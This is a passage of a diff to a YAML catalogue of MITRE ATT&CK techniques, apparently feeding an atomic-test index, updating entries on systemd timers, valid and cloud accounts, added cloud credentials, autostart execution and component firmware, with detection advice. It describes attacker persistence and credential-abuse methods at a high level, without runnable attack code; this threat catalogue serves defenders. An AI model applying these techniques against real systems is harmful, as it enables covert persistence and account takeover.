+ Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
+
+ An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.
+ name: Systemd Timers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1053.006
+ url: https://attack.mitre.org/techniques/T1053/006
+ - source_name: archlinux Systemd Timers Aug 2020
+ url: https://wiki.archlinux.org/index.php/Systemd/Timers
+ description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
+ 12, 2020.
+ - source_name: 'Linux man-pages: systemd January 2014'
+ url: http://man7.org/linux/man-pages/man1/systemd.1.html
+ description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
+ Retrieved April 23, 2019.
+ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
+ AUR Package Repository. Retrieved April 23, 2019.
+ url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
+ source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
+ - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
+ Arch package compromise. Retrieved April 23, 2019.
+ url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
+ source_name: gist Arch package compromise 10JUL2018
+ - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
+ April 23, 2019.
+ url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
+ source_name: acroread package compromised Arch Linux Mail 8JUL2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-14T15:20:00.754Z'
+ created: '2020-10-12T17:50:31.584Z'
+ x_mitre_platforms:
+ - Linux
+ x_mitre_contributors:
+ - SarathKumar Rajendran, Trimble Inc
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
+
+ Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
+
+ Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1055.003:
technique:
external_references:
@@ -7885,13 +8155,8 @@ privilege-escalation:
atomic_tests: []
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -7907,8 +8172,13 @@ privilege-escalation:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -7919,13 +8189,31 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -7936,29 +8224,11 @@ privilege-escalation:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1546.003:
technique:
@@ -8102,6 +8372,15 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1543.003
url: https://attack.mitre.org/techniques/T1543/003
+ - external_id: CAPEC-478
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/478.html
+ - external_id: CAPEC-550
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/550.html
+ - external_id: CAPEC-551
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/551.html
- url: https://technet.microsoft.com/en-us/library/cc772408.aspx
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
source_name: TechNet Services
@@ -8123,12 +8402,12 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T22:22:10.041Z'
+ modified: '2020-09-16T15:49:58.490Z'
created: '2020-01-17T19:13:50.402Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -8668,7 +8947,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-15T12:43:37.469Z'
+ modified: '2020-10-05T16:43:29.473Z'
created: '2017-05-31T21:31:12.196Z'
x_mitre_is_subtechnique: false
x_mitre_version: '2.1'
@@ -8925,42 +9204,59 @@ persistence:
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
+ - source_name: GCP SSH Key Add
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
+ October 1, 2020.
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
+ - source_name: Expel Behind the Scenes
+ url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/
+ description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
+ July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
+ October 1, 2020.'
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Azure Service Principal Credentials
- description: 'Adversaries may add adversary-controlled credentials for Azure
- Service Principals in addition to existing legitimate credentials(Citation:
- Create Azure Service Principal) to maintain persistent access to victim Azure
- accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video)
- Azure Service Principals support both password and certificate credentials.(Citation:
- Why AAD Service Principals) With sufficient permissions, there are a variety
- of ways to add credentials including the Azure Portal, Azure command line
- interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001)
- modules.(Citation: Demystifying Azure AD Service Principals)'
+ name: Additional Cloud Credentials
+ description: |-
+ Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
+
+ Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals)
+
+ After gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-15T12:43:36.340Z'
+ modified: '2020-10-05T16:43:27.024Z'
created: '2020-01-19T16:10:15.008Z'
x_mitre_contributors:
+ - Expel
- Oleg Kolesnikov, Securonix
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
+ - User
x_mitre_detection: |-
- Monitor Azure Activity Logs for service principal modifications.
+ Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
x_mitre_data_sources:
+ - Stackdriver logs
+ - GCP audit logs
+ - AWS CloudTrail logs
- Azure activity logs
x_mitre_platforms:
- Azure AD
- Azure
+ - AWS
+ - GCP
atomic_tests: []
T1546.009:
technique:
@@ -9218,7 +9514,7 @@ persistence:
and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo
keep shims secure, Windows designed them to run in user mode so they cannot
modify the kernel and you must have administrator privileges to install a
- shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)
+ shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)
(UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
@@ -9796,10 +10092,22 @@ persistence:
name: command_prompt
T1547:
technique:
+ id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
+ description: |-
+ Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+ Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
+ name: Boot or Logon Autostart Execution
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1547
url: https://attack.mitre.org/techniques/T1547
+ - external_id: CAPEC-564
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/564.html
- url: http://msdn.microsoft.com/en-us/library/aa376977
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
@@ -9823,29 +10131,18 @@ persistence:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Boot or Logon Autostart Execution
- description: |-
- Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
-
- Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
- id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-06-30T21:23:15.683Z'
+ modified: '2020-10-09T16:05:36.772Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -9864,10 +10161,12 @@ persistence:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
atomic_tests: []
T1037:
technique:
@@ -9899,12 +10198,13 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-27T16:49:15.953Z'
+ modified: '2020-08-03T16:47:37.240Z'
created: '2017-05-31T21:30:38.910Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- macOS
- Windows
+ - Linux
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
@@ -9913,7 +10213,7 @@ persistence:
x_mitre_data_sources:
- File monitoring
- Process monitoring
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
atomic_tests: []
T1542.003:
technique:
@@ -9921,6 +10221,9 @@ persistence:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
+ - external_id: CAPEC-552
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/552.html
- source_name: Mandiant M Trends 2016
url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
@@ -9946,13 +10249,13 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-05-07T22:32:05.335Z'
+ modified: '2020-09-17T19:47:14.338Z'
created: '2019-12-19T21:05:38.123Z'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -10160,7 +10463,7 @@ persistence:
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
- Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
type: attack-pattern
kill_chain_phases:
@@ -10492,6 +10795,15 @@ persistence:
atomic_tests: []
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -10508,15 +10820,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -10527,21 +10830,8 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -10549,9 +10839,39 @@ persistence:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1542.002:
technique:
+ created: '2019-12-19T20:21:21.669Z'
+ modified: '2020-03-23T23:48:33.904Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
+ description: |-
+ Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
+
+ Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
+ name: Component Firmware
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1542.002
@@ -10567,44 +10887,27 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Component Firmware
- description: |-
- Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
-
- Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
- id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-23T23:48:33.904Z'
- created: '2019-12-19T20:21:21.669Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_platforms:
+ - Windows
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1546.015:
technique:
@@ -10776,34 +11079,6 @@ persistence:
atomic_tests: []
T1543:
technique:
- created: '2020-01-10T16:03:18.865Z'
- modified: '2020-03-25T22:32:16.537Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- type: attack-pattern
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- description: "Adversaries may create or modify system-level processes to repeatedly
- execute malicious payloads as part of persistence. When operating systems
- boot up, they can start processes that perform background system functions.
- On Windows and Linux, these system processes are referred to as services.
- (Citation: TechNet Services) On macOS, launchd processes known as [Launch
- Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
- are run to finish system initialization and load user specific parameters.(Citation:
- AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
- daemons, or agents that can be configured to execute at startup or a repeatable
- interval in order to establish persistence. Similarly, adversaries may modify
- existing services, daemons, or agents to achieve the same effect. \n\nServices,
- daemons, or agents may be created with administrator privileges but executed
- under root/SYSTEM privileges. Adversaries may leverage this functionality
